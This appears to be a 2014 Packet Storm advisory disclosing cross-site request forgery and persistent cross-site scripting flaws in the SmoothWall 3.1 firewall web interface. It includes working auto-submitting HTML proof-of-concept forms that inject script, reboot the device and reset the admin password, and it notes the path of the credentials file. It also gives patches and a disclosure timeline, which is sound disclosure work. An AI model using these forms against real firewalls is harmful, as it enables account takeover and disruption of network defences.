what you don't know can hurt you

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting
Posted Dec 22, 2014
Authored by Yann CAM

SmoothWall version 3.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | e453929ef60fcd0ecf00e8d7a5b5b814

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: SmoothWall 3.1 Multiple vulnerabilities
# Date: 21/12/2014
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.smoothwall.org - www.smoothwall.org/download/
# Version: 3.1
# Category: CSRF password reset & XSS persistent
# Google dork:
# Tested on: Smoothwall Linux distribution
######################################################################


Smoothwall firewall/router distribution description :
======================================================================

Smoothwall is a Linux distribution designed to be used as an open source firewall. Designed for ease of use, Smoothwall is configured via a web-based GUI, and requires little or no knowledge of Linux to install or use.
Smoothwall is also a private software company based in the UK that develops firewall and web content filtering software, and which also maintains the SmoothWall open source project.

In version 3.0 SP3, many XSS persistent and CSRF vulnerabilities are present (test on march 2013). Dave B has already published some XSS PoC in a January 17, 2011, which have not been corrected (exploit-db 16006).
The present advisory adds new persistent XSS vectors and PoC for a similar impact. The SmoothWall 3.1 released on october 2014, is still affected by these attack vectors.

Smoothwall webGui is simply protected by a Basic Auth (htaccess) without session token. So any page is CSRF vulnerable.
The httpd daemon listens on HTTP on port 81 and HTTPS on port 441.


Proof of Concept 1 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1

File /httpd/cgi-bin/pppsetup.cgi line 365 :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>$profilenames[$c]\n";

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/pppsetup.cgi' method='post'>
<input type='hidden' name='PROFILENAME' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='PROFILE' value='1' />
<input type='hidden' name='COMPORT' value='ttyS0' />
<input type='hidden' name='DTERATE' value='9600' />
<input type='hidden' name='TELEPHONE' value='' />
<input type='hidden' name='DIALMODE' value='T' />
<input type='hidden' name='MAXRETRIES' value='' />
<input type='hidden' name='TIMEOUT' value='' />
<input type='hidden' name='USERNAME' value='' />
<input type='hidden' name='PASSWORD' value='' />
<input type='hidden' name='AUTH' value='pap-or-chap' />
<input type='hidden' name='LOGINSCRIPT' value='' />
<input type='hidden' name='ACTION' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

This XSS is persistent into the /cgi-bin/pppsetup.cgi page and /cgi-bin/logs.cgi/log.dat from these kind of lines :
File /httpd/cgi-bin/pppsetup.cgi (many occurences) :
&log("$tr{'profile deleted'} $pppsettings{'PROFILENAME'}");


Proof of Concept 2 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3

File /httpd/cgi-bin/vpn.cgi/vpnconfig.dat line 258 :
<td colspan='3'><strong>$tr{'commentc'}</strong> $temp[8]</td>

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/vpn.cgi/vpnconfig.dat' method='post'>
<input type='hidden' name='SECRET1' value='x' />
<input type='hidden' name='SECRET2' value='x' />
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$temp[8] isn't properly sanitize before to be used. This is persistent in this page.


Proof of Concept 3 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1

File /httpd/cgi-bin/ddns.cgi line 273 :
&displaytable($filename, \%render_settings, $cgiparams{'ORDER'}, $cgiparams{'COLUMN'} );

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ddns.cgi' method='post'>
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
All POST params are transmitted to the &displaytable() function without any sanitization. The COMMENT var permit a persistent XSS in this page.


Proof of Concept 4 :
======================================================================

XSS non-persistent through POST, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/ipinfo.cgi line 76 and 101 :
&openbox("$addr ($hostname)");

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ipinfo.cgi' method='post'>
<input type='hidden' name='IP' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Run' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$addr isn't properly sanitize before printed in the page. This is a non-persistent XSS.

Proof of Concept 5 :
======================================================================

CSRF for reboot SmoothWall, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/shutdown.cgi

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/shutdown.cgi' method='post'>
<input type='hidden' name='ACTION' value='Reboot' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


Proof of Concept 6 :
======================================================================

CSRF for change SmoothWall password admin & dial account. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/changepw.cgi

At least 6 characters alnum.

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/changepw.cgi' method='post'>
<input type='hidden' name='ADMIN_PASSWORD1' value='newpassword' />
<input type='hidden' name='ADMIN_PASSWORD2' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='ACTION_DIAL' value='Save' />
<input type='hidden' name='ACTION_ADMIN' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


How to prevent and protect from these vuln ?
======================================================================

For example, concerning the PoC n°1 in the file /httpd/cgi-bin/pppsetup.cgi :

To protect and prevent SmoothWall from XSS, include CGI module in the header of each vuln page (like pppsetup.cgi) :
use CGI qw(:standard);

Then, at the line 365, sanitize the $profilenames[$c] var like this :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>" . escapeHTML($profilenames[$c]) . "\n";

And for the log page, sanitize in all file the log function call :
&log("$tr{'profile deleted'} " . escapeHTML($pppsettings{'PROFILENAME'}));

Finally, to prevent from CSRF attack, add a token mechanism on all page, or simply check the referer of each request before using POST variables (like in the IPCop firewall/router distribution, which is initially a SmoothWall fork).


Additional note :
======================================================================

It's possible to upload arbitrary file with custom content on the system. But the file is renamed to /var/smoothwall/adsl/mgmt.o.
Use the upload form here : http://SMOOTHWALL_IP:81/cgi-bin/alcateladslfw.cgi

The htpasswd file with admin & dial credentials to access webgui is located here : /var/smoothwall/auth/users


Solution:
======================================================================
2014-24-12 : None official. Users of SmoothWall need to apply patch himself.


Report timeline :
======================================================================

2013-26-03 : Team alerted with details & PoC.
2013-04-09 : Second alert sent to the team
2013-04-09 : First team response (06:00pm) who claims to have knowledge of these bugs and is not considered as issues.
2013-04-10 : Second team response (01:18am), with consideration of these vulns but, I quote : "I was told that while this is a "potential" vulnerability it requires several things to happen for this to be an actual vulnerability."
2013-04-12 : My next response, with details on "how to protect SmootWall from these vulns", and many links pointed to CSRF attacks references and considered as critical.
2014-10-11 : SmootWall 3.1 released, still affected by these issues.
2014-12-21 : Public advisory with some tips to patch manually the solution (from Dave B. advisory in january 2011 to SmoothWall 3.1 in october 2014, there was no official patches).


Additional resources :
======================================================================

- www.smoothwall.org
- www.asafety.fr
- www.exploit-db.com/exploits/16006/
- www.securecoding.cert.org/confluence/display/perl/IDS33-PL.+Sanitize+untrusted+data+passed+across+a+trust+boundary


Credits :
======================================================================
Yann CAM - Security Consultant @ ASafety

--
CONTACT: www.asafety.fr
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close